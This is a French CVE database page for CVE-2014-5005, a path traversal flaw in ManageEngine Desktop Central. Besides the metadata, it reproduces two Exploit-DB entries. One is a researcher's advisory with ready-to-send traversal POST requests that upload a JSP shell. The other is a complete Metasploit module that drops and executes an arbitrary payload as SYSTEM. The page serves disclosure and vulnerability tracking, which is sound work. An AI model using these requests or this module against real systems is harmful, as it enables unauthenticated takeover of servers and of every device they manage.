CVE-2014-5005
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
Directory traversal vulnerability in ZOHO ManageEngine Desktop Central (DC) before 9 build 90055 allows remote attackers to execute arbitrary code via a .. (dot dot) in the fileName parameter in an LFU action to statusUpdate.
Informations du CVE
Faiblesses connexes
| Nom de la faiblesse | Source | |
|---|---|---|
| Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. |
Métriques
| Métriques | Score | Gravité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 7.5 | AV:N/AC:L/Au:N/C:P/I:P/A:P | nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 34518
Date de publication : 2014-08-31 22h00 +00:00
Auteur : Pedro Ribeiro
EDB Vérifié : No
Arbitrary file upload / remote code execution in ManageEngine Desktop Central / Desktop Central MSP
Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
=================================================================================
Background on the affected product:
"Desktop Central is an integrated desktop & mobile device management
software that helps in managing the servers, laptops, desktops,
smartphones and tablets from a central point. It automates your
regular desktop management routines like installing patches,
distributing software, managing your IT Assets, managing software
licenses, monitoring software usage statistics, managing USB device
usage, taking control of remote desktops, and more."
There are several vulnerable servers are out there if you know the
Google dorks. Quoting the author of the Internet Census 2012: "As a
rule of thumb, if you believe that "nobody would connect that to the
Internet, really nobody", there are at least 1000 people who did."
These vulnerabilities can be abused to achieve remote code execution
as SYSTEM in Windows. I've updated the desktopcentral_file_upload
Metasploit module to use the new statusUpdate technique. Needless to
say, owning a Desktop Central box will give you control of all the
computers and smartphones it manages.
Technical details:
#1
Vulnerability: Remote code execution as SYSTEM via file upload (unauthenticated)
Constraints: none; no authentication or any other information needed
a)
CVE-2014-5005
Affected versions: all versions from v7 to v9 build 90054
Fix: Upgrade to DC v9 build 90055
POST /statusUpdate?actionToCall=LFU&customerId=1337&fileName=../../../../../../shell.jsp&configDataID=1
<... your favourite jsp shell here ...>
b)
CVE-2014-5006
Affected versions: all versions from v8 to v9 build 90054
Fix: Upgrade to DC v9 build 90055
POST /mdm/mdmLogUploader?filename=..\\..\\..\webapps\\DesktopCentral\\shell.jsp
<... your favourite jsp shell here ...>
#2
CVE-2014-5007
Vulnerability: Remote code execution as SYSTEM via file upload (unauthenticated)
Constraints: no authentication needed; need to know valid
computerName, domainName and customerId
Affected versions: all versions from v7 to v9 build 90054
Fix: Upgrade to DC v9 build 90055
Notes: This was previously discovered as CVE-2013-7390 / OSVDB-10008
by Thomas Hibbert, and was "fixed" in 2013-11-09. The fix is
incomplete and it is still possible to upload a shell with a valid
computerName, domainName and customerId.
POST /agentLogUploader?computerName=whatever1&domainName=whatever2&customerId=1337&filename=..\\..\\..\\..\\webapps\\DesktopCentral\\shell.jsp
<... your favourite jsp shell here ...>
Exploit Database EDB-ID : 34594
Date de publication : 2014-09-08 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'ManageEngine Desktop Central StatusUpdate Arbitrary File Upload',
'Description' => %q{
This module exploits an arbitrary file upload vulnerability in ManageEngine DesktopCentral
v7 to v9 build 90054 (including the MSP versions).
A malicious user can upload a JSP file into the web root without authentication, leading to
arbitrary code execution as SYSTEM. Some early builds of version 7 are not exploitable as
they do not ship with a bundled Java compiler.
},
'Author' =>
[
'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2014-5005'],
['OSVDB', '110643'],
['URL', 'http://seclists.org/fulldisclosure/2014/Aug/88'],
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/me_dc9_file_upload.txt']
],
'Platform' => 'win',
'Arch' => ARCH_X86,
'Targets' =>
[
[ 'Desktop Central v7 to v9 build 90054 / Windows', {} ]
],
'Privileged' => true,
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 31 2014'
))
register_options([Opt::RPORT(8020)], self.class)
end
# Test for Desktop Central
def check
res = send_request_cgi({
'uri' => normalize_uri("configurations.do"),
'method' => 'GET'
})
if res && res.code == 200
build = nil
if res.body.to_s =~ /ManageEngine Desktop Central 7/ ||
res.body.to_s =~ /ManageEngine Desktop Central MSP 7/ # DC v7
print_status("#{peer} - Detected Desktop Central v7")
elsif res.body.to_s =~ /ManageEngine Desktop Central 8/ ||
res.body.to_s =~ /ManageEngine Desktop Central MSP 8/
if res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/ # DC v8 (later versions)
build = $1
print_status("#{peer} - Detected Desktop Central v8 #{build}")
else # DC v8 (earlier versions)
print_status("#{peer} - Detected Desktop Central v8")
end
elsif res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/ # DC v9 (and higher?)
build = $1
end
if build.nil?
return Exploit::CheckCode::Unknown
elsif Gem::Version.new(build) < Gem::Version.new("90055")
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Safe
end
end
Exploit::CheckCode::Unknown
end
def exploit
print_status("#{peer} - Uploading JSP to execute the payload")
exe = payload.encoded_exe
exe_filename = rand_text_alpha_lower(8) + ".exe"
jsp_payload = jsp_drop_and_execute(exe, exe_filename)
jsp_name = rand_text_alpha_lower(8) + ".jsp"
send_request_cgi({
'uri' => normalize_uri('statusUpdate'),
'method' => 'POST',
'data' => jsp_payload,
'ctype' => 'text/html',
'vars_get' => {
'actionToCall' => 'LFU',
'configDataID' => '1',
'customerId' => rand_text_numeric(4),
'fileName' => '../' * 6 << jsp_name
}
})
# We could check for HTTP 200 and a "success" string.
# However only some later v8 and v9 versions return this; and we don't really care
# and do a GET to the file we just uploaded anyway.
register_files_for_cleanup(exe_filename)
register_files_for_cleanup("..\\webapps\\DesktopCentral\\#{jsp_name}")
print_status("#{peer} - Executing payload")
send_request_cgi(
{
'uri' => normalize_uri(jsp_name),
'method' => 'GET'
})
end
def jsp_drop_bin(bin_data, output_file)
jspraw = %Q|<%@ page import="java.io.*" %>\n|
jspraw << %Q|<%\n|
jspraw << %Q|String data = "#{Rex::Text.to_hex(bin_data, "")}";\n|
jspraw << %Q|FileOutputStream outputstream = new FileOutputStream("#{output_file}");\n|
jspraw << %Q|int numbytes = data.length();\n|
jspraw << %Q|byte[] bytes = new byte[numbytes/2];\n|
jspraw << %Q|for (int counter = 0; counter < numbytes; counter += 2)\n|
jspraw << %Q|{\n|
jspraw << %Q| char char1 = (char) data.charAt(counter);\n|
jspraw << %Q| char char2 = (char) data.charAt(counter + 1);\n|
jspraw << %Q| int comb = Character.digit(char1, 16) & 0xff;\n|
jspraw << %Q| comb <<= 4;\n|
jspraw << %Q| comb += Character.digit(char2, 16) & 0xff;\n|
jspraw << %Q| bytes[counter/2] = (byte)comb;\n|
jspraw << %Q|}\n|
jspraw << %Q|outputstream.write(bytes);\n|
jspraw << %Q|outputstream.close();\n|
jspraw << %Q|%>\n|
jspraw
end
def jsp_execute_command(command)
jspraw = %Q|\n|
jspraw << %Q|<%\n|
jspraw << %Q|Runtime.getRuntime().exec("#{command}");\n|
jspraw << %Q|%>\n|
jspraw
end
def jsp_drop_and_execute(bin_data, output_file)
jsp_drop_bin(bin_data, output_file) + jsp_execute_command(output_file)
end
end
Products Mentioned
Configuraton 0
Zohocorp>>Manageengine_desktop_central >> Version To (including) 9.0
- Zohocorp>>Manageengine_desktop_central >> Version - (Open CPE detail)
- Zohocorp>>Manageengine_desktop_central >> Version - (Open CPE detail)
- Zohocorp>>Manageengine_desktop_central >> Version 7.0 (Open CPE detail)
- Zohocorp>>Manageengine_desktop_central >> Version 7.0.0 (Open CPE detail)
- Zohocorp>>Manageengine_desktop_central >> Version 7.0.1 (Open CPE detail)
- Zohocorp>>Manageengine_desktop_central >> Version 8.0.0 (Open CPE detail)
- Zohocorp>>Manageengine_desktop_central >> Version 9.0 (Open CPE detail)
- Zohocorp>>Manageengine_desktop_central >> Version 9.0 (Open CPE detail)
Références
https://www.manageengine.com/products/desktop-central/remote-code-execution.html
Tags : x_refsource_CONFIRM
Tags : x_refsource_CONFIRM
https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_dc9_file_upload.txt
Tags : x_refsource_MISC
Tags : x_refsource_MISC
